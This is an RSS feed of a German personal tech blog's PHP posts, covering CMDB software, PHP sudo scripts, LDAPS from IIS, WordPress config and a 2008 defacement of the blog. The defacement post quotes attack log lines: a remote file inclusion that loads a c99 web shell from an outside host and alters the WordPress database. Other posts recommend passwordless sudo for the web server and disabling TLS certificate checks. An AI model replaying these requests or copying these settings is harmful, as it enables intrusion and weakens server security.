<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>AnB-Networkz &#187; php</title>
	<atom:link href="http://anb-networkz.de/tag/php/feed/" rel="self" type="application/rss+xml" />
	<link>http://anb-networkz.de</link>
	<description>Die Farben der Technik</description>
	<lastBuildDate>Fri, 30 Dec 2011 19:59:14 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3</generator>
		<item>
		<title>i-doit &#8211; Webbasierende ITIL-konforme cmdb mit einigen Hindernissen</title>
		<link>http://anb-networkz.de/2011/10/i-doit-webbasierende-itil-konforme-cmdb-mit-einigen-hindernissen/</link>
		<comments>http://anb-networkz.de/2011/10/i-doit-webbasierende-itil-konforme-cmdb-mit-einigen-hindernissen/#comments</comments>
		<pubDate>Tue, 04 Oct 2011 17:18:44 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Allgemein]]></category>
		<category><![CDATA[anwendung]]></category>
		<category><![CDATA[cmdb]]></category>
		<category><![CDATA[itil]]></category>
		<category><![CDATA[itsm]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[software]]></category>
		<category><![CDATA[web]]></category>

		<guid isPermaLink="false">http://anb-networkz.de/?p=973</guid>
		<description><![CDATA[In der IT ist die Verwaltung der Infrastruktur, Bezüge der Komponenten, Standorte und sonstigen Abhängigkeiten schon immer ein Problem. Je nachdem aus welchem Blichwinkel das Problem betrachtet wird entstehen neue Probleme. Und hier versucht die CMDB des aktuellen ITIL-Modells anzusetzen. &#8230; <a href="http://anb-networkz.de/2011/10/i-doit-webbasierende-itil-konforme-cmdb-mit-einigen-hindernissen/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>In der IT ist die Verwaltung der Infrastruktur, Bezüge der Komponenten, Standorte und sonstigen Abhängigkeiten schon immer ein Problem. Je nachdem aus welchem Blichwinkel das Problem betrachtet wird entstehen neue Probleme. Und hier versucht die CMDB des aktuellen ITIL-Modells anzusetzen. Elemente, ob Kontakte, Computer, Standorte oder sogar Kabel und Stecker werden als logische Elemente in einer Datenbank abgebildet. Der sogenannten <strong>C</strong>onfiguration <strong>M</strong>anagement <strong>D</strong>ata <strong>B</strong>ase. Diese Elemente, oder <strong>C</strong>onfiguration <strong>I</strong>tems (CI´s) genannt, bilden, im Bezug zueinander angeordnet, die logische IT-Struktur der Firma ab. Elemente können nach ITIL nicht einfach gelöscht werden, sondern gehen in einen anderen Status über. Wird zum Beispiel ein neues System geliefert, geht es vom Status Bestellt zu geliefert, in Betrieb zu Ausgemustert und schließlich zu verschrottet. Je nach Art des CI´s kann der Lebenszyklus verschiedener Elemente sehr gut abgebildet und Dokumentiert werden.</p>
<p>Aber nun zu i-doit.</p>
<p>Die im PHP geschriebene Anwendung bildet alle wichtigen Elemente einer CMDB ab. Typen wie Standort, Raum, Host, Server, ja sogar Virtueller Server oder SIM-Karte sind vorhanden. Die moderne und schnelle AJAX-Oberfläche ist sehr komfortabel bedienbar und selbst für Einsteiger schnell zu verstehen. Besonders gut gelöst ist das schnelle und einfache Hinzufügen zusätzlicher Kategorien. Erfordert ein Element zusätzliche Attribute (z.B. Skype-Kennung für das Objekt Person oder Teamviewer-ID für Clients) können diese sehr einfach angelegt und zugewiesen werden.</p>
<p>Leider gibt es jedoch in der Open-Version einige Macken. So erscheinen in der aktuell getesteten Version 0.9.7nach einer LDAP-Synchronisierung mit einem ActiveDirectory plötzlich doppelte Kontakte, die Druckansicht ist nur sehr unzureichend umgesetzt oder die Vorlagen zum gleichzeitigen Erstellen mehrerer CI´s funktionieren nicht. Reaktionen im Entwicklerforum können, wenn sie denn überhaupt erfolgen, auch mal mehrere Tage dauern.</p>
<p>Zusammenfassend überwiegen aber die Vorteile der Kernfunktionen gegenüber den Fehlern. Es kann ja schließlich davon ausgegangen werden das die Bugs früher oder später behoben werden.</p>
<p>Mehr über I-Doit auf der Offiziellen Website <a title="I-Doit" href="http://i-doit.org" target="_blank">http://www.i-doit.org</a></p>
]]></content:encoded>
			<wfw:commentRss>http://anb-networkz.de/2011/10/i-doit-webbasierende-itil-konforme-cmdb-mit-einigen-hindernissen/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PHP &#8211; Shell Scripte mit root-rechten ausführen &#8211; sudo</title>
		<link>http://anb-networkz.de/2011/08/php-shell-scripte-mit-root-rechten-ausfuhren-sudo/</link>
		<comments>http://anb-networkz.de/2011/08/php-shell-scripte-mit-root-rechten-ausfuhren-sudo/#comments</comments>
		<pubDate>Fri, 05 Aug 2011 21:57:20 +0000</pubDate>
		<dc:creator>Andre</dc:creator>
				<category><![CDATA[Allgemein]]></category>
		<category><![CDATA[HowTo]]></category>
		<category><![CDATA[apache]]></category>
		<category><![CDATA[internet]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[root]]></category>
		<category><![CDATA[script]]></category>
		<category><![CDATA[shell]]></category>
		<category><![CDATA[sudo]]></category>

		<guid isPermaLink="false">http://anb-networkz.de/?p=909</guid>
		<description><![CDATA[Wie immer steht am Anfang eine Idee. Bei mir war es der Wunsch, vom Smartphone das kopieren der Speicherkarten meiner Kameras zu starten. Das ganze vollständig zu automatisieren war mir zu riskant, da ich schon noch zwischen Mounten (für Samba), &#8230; <a href="http://anb-networkz.de/2011/08/php-shell-scripte-mit-root-rechten-ausfuhren-sudo/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Wie immer steht am Anfang eine Idee. Bei mir war es der Wunsch, vom Smartphone das kopieren der Speicherkarten meiner Kameras zu starten. Das ganze vollständig zu automatisieren war mir zu riskant, da ich schon noch zwischen Mounten (für Samba), Kopieren und Verschieben der Dateien auf der Speicherkarte unterscheiden wollte.</p>
<p>Alles haben diese Befehle gemeinsam, man benötigt root-rechte zum Mounten und Auswerfen der Speicherkarten. Webserver mit root-rechten betreiben? suexec Modul von Apache nutzen? Alles zu riskant und viel zu kompliziert. Der einfachste weg ist es, ein Shellscript mit root-Berechtigungen vom Webserver aus zu starten. Und das geht am besten mit sudo.<code></code></p>
<p>Um das Script <code>/usr/local/sbin/webscript.sh</code> unter root rechten zu starten, muss zuerst der Webserver berechtigt werden, das Script unter root Rechten zu starten. Das geht in der Datei /etc/sudoers. Der Eintrag<br />
<code></code></p>
<p><code>apache ALL=(ALL) NOPASSWD: </code><code>/usr/local/sbin/webscript.sh</code></p>
<p>berechtigt den Benutzer apache von jedem Quellhost ohne zusätzliche Passworteingabe das Script auszuführen. Funktioniert das, sollte der Host auf localhost begrenzt werden.<br />
Anschließend kann das Script aus PHP mittels<br />
<code></code></p>
<p><code>system('sudo /usr/local/sbin/webscript.sh');</code></p>
<p>oder wenn die Ausgabe direkt im Browser ausgegeben werden soll mit<br />
<code></code></p>
<p><code>passtruh('sudo /usr/local/sbin/webscript.sh');</code></p>
<p>ausgeführt werden. erstellt man nun ein Shellscript das eine CF-Karte mountet, je nach Parameter die Dateien kopiert oder verschiebt und startet es per PHP vom webserver, kannd er Kopiervorgang von jedem http fähigen Gerät aufgerufen werden. So ist ein Szenario denkbar, vom Streaming-Radio mit RSS-Reader komplexe Scripte am Webserver auszuführen.</p>
]]></content:encoded>
			<wfw:commentRss>http://anb-networkz.de/2011/08/php-shell-scripte-mit-root-rechten-ausfuhren-sudo/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Bilder mit PHP skalieren &#8211; image-Funktionen</title>
		<link>http://anb-networkz.de/2011/07/bilder-mit-php-skalieren-image-funktionen/</link>
		<comments>http://anb-networkz.de/2011/07/bilder-mit-php-skalieren-image-funktionen/#comments</comments>
		<pubDate>Wed, 27 Jul 2011 15:11:10 +0000</pubDate>
		<dc:creator>Andre</dc:creator>
				<category><![CDATA[Allgemein]]></category>
		<category><![CDATA[HowTo]]></category>
		<category><![CDATA[foto]]></category>
		<category><![CDATA[internet]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[scaler]]></category>
		<category><![CDATA[script]]></category>

		<guid isPermaLink="false">http://anb-networkz.de/?p=885</guid>
		<description><![CDATA[Nachdem mich nun mehrere Leute nach einem Image Scaler für PHP fragten, und ja finestpics.de so etwas verwendet, habe ich dazu entschlossen ein kleines Script für genau dieses Problem zu veröffentlichen. Das Script lädt ein Bild in den Speicher, ermittelt &#8230; <a href="http://anb-networkz.de/2011/07/bilder-mit-php-skalieren-image-funktionen/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Nachdem mich nun mehrere Leute nach einem Image Scaler für PHP fragten, und ja finestpics.de so etwas verwendet, habe ich dazu entschlossen ein kleines Script für genau dieses Problem zu veröffentlichen. Das Script lädt ein Bild in den Speicher, ermittelt Länge und Breite und skaliert das Bild auf die lange Seite ohne Verzerrung. Aber mehr dazu sollte jedem beim lesen des Quellcodes klar werden.</p>
<p>Für die ganze Skalierung werden die Image/gd Funktionen von PHP verwendet. Es sollte ab php4 funktionieren.</p>
<p><a title="Image Scaler" href="http://finestpics.de/scale.php" target="_blank">Hier gehts zum Script.</a></p>
]]></content:encoded>
			<wfw:commentRss>http://anb-networkz.de/2011/07/bilder-mit-php-skalieren-image-funktionen/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>finestpics.de Umbau fast fertig</title>
		<link>http://anb-networkz.de/2010/12/finestpics-de-umbau-fast-fertig/</link>
		<comments>http://anb-networkz.de/2010/12/finestpics-de-umbau-fast-fertig/#comments</comments>
		<pubDate>Thu, 16 Dec 2010 07:20:38 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Allgemein]]></category>
		<category><![CDATA[entwicklung]]></category>
		<category><![CDATA[finestpics]]></category>
		<category><![CDATA[fotos]]></category>
		<category><![CDATA[html]]></category>
		<category><![CDATA[internet]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[seite]]></category>
		<category><![CDATA[web]]></category>

		<guid isPermaLink="false">http://anb-networkz.de/?p=809</guid>
		<description><![CDATA[So, es ist fast geschafft. Das alte Layout, basierend auf Tabellen in Tabellen in Tabellen in [...] ist nun fast vollständig auf reines CSS umgestellt. Zugegeben, ich musste so gut wie jede Funktion umschreiben, da die neue Engine URLs im &#8230; <a href="http://anb-networkz.de/2010/12/finestpics-de-umbau-fast-fertig/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>So, es ist fast geschafft. Das alte Layout, basierend auf Tabellen in Tabellen in Tabellen in [...] ist nun fast vollständig auf reines CSS umgestellt. Zugegeben, ich musste so gut wie jede Funktion umschreiben, da die neue Engine URLs im Stiel /funktion/parm1/parm2/parm3 und nicht mehr Seite?parm1=y&amp;parm2=y&amp;parm3=z generiert. Auch sind neue Features wie ein dynamischer Fotostreifen als Header oder die automatische Erstellung des Logo-Footers im Bild dazugekommen. Optimistisch gesehen sollte der Umbau bis Weihnachten abgeschlossen sein.</p>
<p>Schaut es euch an, auf<a href="http://finestpics.de/site" target="_blank"> finestpics.de/site</a> liegt die überarbeitete Version.</p>
]]></content:encoded>
			<wfw:commentRss>http://anb-networkz.de/2010/12/finestpics-de-umbau-fast-fertig/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mit PHP im IIS unter Windows Server via sicheres LDAP auf ActiveDirectory zugreifen</title>
		<link>http://anb-networkz.de/2010/06/mit-php-im-iis-unter-windows-server-via-sicheres-ldap-auf-activedirectory-zugreifen/</link>
		<comments>http://anb-networkz.de/2010/06/mit-php-im-iis-unter-windows-server-via-sicheres-ldap-auf-activedirectory-zugreifen/#comments</comments>
		<pubDate>Tue, 15 Jun 2010 11:00:37 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Allgemein]]></category>
		<category><![CDATA[HowTo]]></category>
		<category><![CDATA[active directory]]></category>
		<category><![CDATA[iis]]></category>
		<category><![CDATA[internet]]></category>
		<category><![CDATA[ldaps]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[server]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://anb-networkz.de/?p=603</guid>
		<description><![CDATA[Wer sollte nicht schon immer mal aus PHP auf ActiveDirectory zugreifen. Und das ganze am besten noch SSL-Geschützt über LDAPS (Port 636). Und das gnaze auch noch auf einem Windows Server 2003 mit IIS &#8230; wuah &#8230; aber in bestimmten &#8230; <a href="http://anb-networkz.de/2010/06/mit-php-im-iis-unter-windows-server-via-sicheres-ldap-auf-activedirectory-zugreifen/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Wer sollte nicht schon immer mal aus PHP auf ActiveDirectory zugreifen. Und das ganze am besten noch SSL-Geschützt über LDAPS (Port 636). Und das gnaze auch noch auf einem Windows Server 2003 mit IIS &#8230; wuah &#8230; aber in bestimmten Situationen geht es nicht anders.</p>
<p>Wie man PHP im IIS einbindet werde ich hier nicht beschreiben. Allerdings sollte man das LDAP-Modul auch laden. Dazu entfernt man einfach den Kommentar in der Zeile &#8220;;extension=php_ldap.dll&#8221;. Aber noch nicht genug. In der Standardeinstellung versucht das LDAP-Modul bei einer Verbindung über SSL das Zertifikat zu prüfen. Dies scheitert meistens und man erhält die Fehlermeldung <em>&#8221; ldap_bind(): Unable to bind to server: Can&#8217;t contact LDAP server&#8221;. </em>Unschön. Um die Zertifikatsprüfung abzuschalten, erstellt man auf Laufwerk C: des Servers den Ordner  &#8220;C:\openldap\sysconf&#8221; und legt dort eine Datei namens &#8220;ldap.conf&#8221; ab. Hier können nun Einstellungen für das OpenLDAP-Modul gesetzt werden. Um die Zertifikatsprüfung abzuschalten, reicht es hier die Zeile &#8220;TLS_REQCERT never&#8221; einzutragen. Anschließend sollte man den IIS &#8220;WWW-Publishingdienst&#8221; neustarten.</p>
<p>Eine Verbindung zum LDAP-Server stellt man nun mit PHP wie folgt her:</p>
<p><code><br />
$ldap-&gt;user="user@ad.firma.de";  // Benutzername in form LOGON@DOMÄNE<br />
$ldap-&gt;password="12345";          // Passwort des Benutzers<br />
$ldap-&gt;server="ad.firma.de";       // LDAP-Server, bei AD-Domänen kann einfach der Domänenname angegeben werden<br />
/* Verbindung mit dem LDAP-Server herstellen */<br />
$ldap-&gt;conn=ldap_connect("ldaps://".$ldap-&gt;server, 636);			// Verbinde mit Server über LDAPS auf Port 636<br />
ldap_set_option($ldap-&gt;conn, LDAP_OPT_PROTOCOL_VERSION, 3);	// Verwende LDAP Protokoll version 3<br />
ldap_set_option($ldap-&gt;conn, LDAP_OPT_REFERRALS, 0);			// Referenzen nicht folgen<br />
/* Nun melden wir uns am LDAP-Server an (LDAP-BIND)*/<br />
$ldap-&gt;bind=ldap_bind($ldap-&gt;conn,$ldap-&gt;user,$ldap-&gt;password);	// Verbindung herstellen<br />
</code><br />
Nun könnte man im LDAP Suchanfragen oder andere Dinge unter den Rechten des Bind-Benutzers starten. Viel Spaß.</p>
]]></content:encoded>
			<wfw:commentRss>http://anb-networkz.de/2010/06/mit-php-im-iis-unter-windows-server-via-sicheres-ldap-auf-activedirectory-zugreifen/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress Site URL bei Anfragen über einen SSL-Proxy umschreiben</title>
		<link>http://anb-networkz.de/2009/09/wordpress-site-url-bei-anfragen-uber-einen-ssl-proxy-umschreiben/</link>
		<comments>http://anb-networkz.de/2009/09/wordpress-site-url-bei-anfragen-uber-einen-ssl-proxy-umschreiben/#comments</comments>
		<pubDate>Tue, 29 Sep 2009 22:00:56 +0000</pubDate>
		<dc:creator>Andre</dc:creator>
				<category><![CDATA[Allgemein]]></category>
		<category><![CDATA[blog]]></category>
		<category><![CDATA[code]]></category>
		<category><![CDATA[http]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[ssl]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://anb-networkz.de/?p=278</guid>
		<description><![CDATA[So, nun habe ich es doch hinbekommen, dass WordPress die Blog-URL bei SSL-Anfragen richtig erkennt. Eigentlich ist es ziemlich einfach. Auch bei neueren WordPress-Versionen kann in der &#8220;wp_config.php&#8221;  die SiteURL und die Homepage angegeben werden. Wird eine HTTPS-Anfrage über einen &#8230; <a href="http://anb-networkz.de/2009/09/wordpress-site-url-bei-anfragen-uber-einen-ssl-proxy-umschreiben/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>So, nun habe ich es doch hinbekommen, dass WordPress die Blog-URL bei SSL-Anfragen richtig erkennt. Eigentlich ist es ziemlich einfach. Auch bei neueren WordPress-Versionen kann in der &#8220;wp_config.php&#8221;  die SiteURL und die Homepage angegeben werden. Wird eine HTTPS-Anfrage über einen Proxy gestellt, schreibt dieser normalerweise seinen Hostnamen in die Header-Zeile &#8220;HTTP_X_FORWARDED_HOST&#8221;. Diese findet man im Array $_SERVER unter dem Schlüssel &#8220;HTTP_X_FORWARDED_HOST&#8221;. Ist dieser Wert gleich dem SSL-Proxy des Providers, definiert man die Site-URL über den SSL-Proxy. Andernfalls wird hier die normale Blog-URL definiert.</p>
<p>Hier der Code-Schnipsel aus meiner wp_config.php (ssl-account.com ist die Adresse des SSL-Proxys)</p>
<p><code>if($_SERVER['HTTP_X_FORWARDED_HOST']=="ssl-account.com")<br />
 {<br />
  // mit SSL-Proxy<br />
  define('WP_SITEURL', 'https://ssl-account.com/anb-networkz.de');<br />
  define('WP_HOME', 'https://ssl-account.com/anb-networkz.de');<br />
 }<br />
else<br />
 {<br />
  // Ohne SSL-Proxy<br />
  define('WP_SITEURL', 'http://anb-networkz.de');<br />
  define('WP_HOME', 'http://anb-networkz.de');<br />
 }<br />
</code></p>
]]></content:encoded>
			<wfw:commentRss>http://anb-networkz.de/2009/09/wordpress-site-url-bei-anfragen-uber-einen-ssl-proxy-umschreiben/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>anb-networkz defaced</title>
		<link>http://anb-networkz.de/2008/06/anb-networkz-defaced/</link>
		<comments>http://anb-networkz.de/2008/06/anb-networkz-defaced/#comments</comments>
		<pubDate>Sun, 01 Jun 2008 13:53:03 +0000</pubDate>
		<dc:creator>Andre</dc:creator>
				<category><![CDATA[Allgemein]]></category>
		<category><![CDATA[Bugs]]></category>
		<category><![CDATA[defaced]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[mysql]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[Sicherheit]]></category>
		<category><![CDATA[sql-injection]]></category>
		<category><![CDATA[webserver]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://anb-networkz.de/?p=59</guid>
		<description><![CDATA[Am 30.05.2008 hat es mein kleines Blog erwischt. Eine Person der XTech Group hat doch tatsächlich per SQL-Injection einige Einträge in der WordPress-Datenbank geändert. Zum Glück habe ich ja Backup&#8217;s. Das habe ich gleich als Anlass für ein Upgrade auf &#8230; <a href="http://anb-networkz.de/2008/06/anb-networkz-defaced/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p><a href="http://anb-networkz.net/wp-content/uploads/2008/06/defaced.png"><img class="alignleft size-thumbnail wp-image-60" title="defaced" src="http://anb-networkz.de/wp-content/uploads/2008/06/defaced-150x150.png" alt="Screenshot vom Ergebniss der SQL-Injection" width="150" height="150" /></a>Am 30.05.2008 hat es mein kleines Blog erwischt. Eine Person der XTech Group hat doch tatsächlich per SQL-Injection einige Einträge in der WordPress-Datenbank geändert. Zum Glück habe ich ja Backup&#8217;s. Das habe ich gleich als Anlass für ein Upgrade auf die aktuelle WPD Version genutzt. Nunja, eigentlich konnte wordpress nichts für den deface. Die Pseudo-hacker nutzten ein Script eines früheren CMS, um die wpp-config.php auszulesen. Anschließend wurden mit einigen SQL-Query&#8217;s diverse Datensätze in der MySQL Datenbank geändert. Unter anderem auch der Blog-title und die Blod-Description. Was soll&#8217;s.  auch ganz lustig anzuschauen waren die Request-Header in den Logfiles des Webservers. Dort ließ sich der deface quasi Nachstellen. Hier einige Einträge:<br />
<code><br />
GET http://anb-networkz.net/html/modules/contact/main.php?this_module_path<br />
=http%3A%2F%2Fwww.mitsubishimania.de%2Fjs%2F1337c99.txt%3F%3F&amp;act=f&amp;<br />
f=wp-config.php&amp;d=%2Fwww%2Fhtdocs%2Fv100329&amp;"<br />
POST /html/modules/contact/main.php?this_module_path=<br />
http%3A%2F%2Fwww.mitsubishimania.de%2Fjs%2F1337c99.txt%3F%3F&amp;<br />
act=sql&amp;sql_login=*******&amp;sql_passwd=**********&amp;<br />
sql_server=localhost&amp;sql_port=3306&amp;sql_db=***&amp;<br />
sql_tbl_act=insert&amp;sql_tbl=wp_options&amp;sql_tbl_ls=0&amp;<br />
sql_tbl_le=30&amp;sql_tbl_insert_q=+%60option_id%60+%3D+<br />
%272%27+AND+%60blog_id%60+%3D+%270%27+AND+%60option_name%<br />
60+%3D+%27blogname%27+AND+%60option_value%60+%3D+<br />
%27..%3A%3AANB-Networkz%3A%3A..%27+AND+%60autoload%60+<br />
%3D+%27yes%27+<br />
</code><br />
Der Aufrufe wurden von 203.162.2.133 ausgelöst, und nutzten Scripte einer (warscheinlich gehackten) website. Da sich dort ein Forum befindet, werde ich das gleich mal dort Posten.</p>
<p>Ich habe nun nur noch WordPress auf diesem Webspace, alle Kennwörter wurden geändert und eine obligatorische Anzeige gegen unbekannt eingereicht. Mal sehen was passiert <img src='http://anb-networkz.de/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://anb-networkz.de/2008/06/anb-networkz-defaced/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

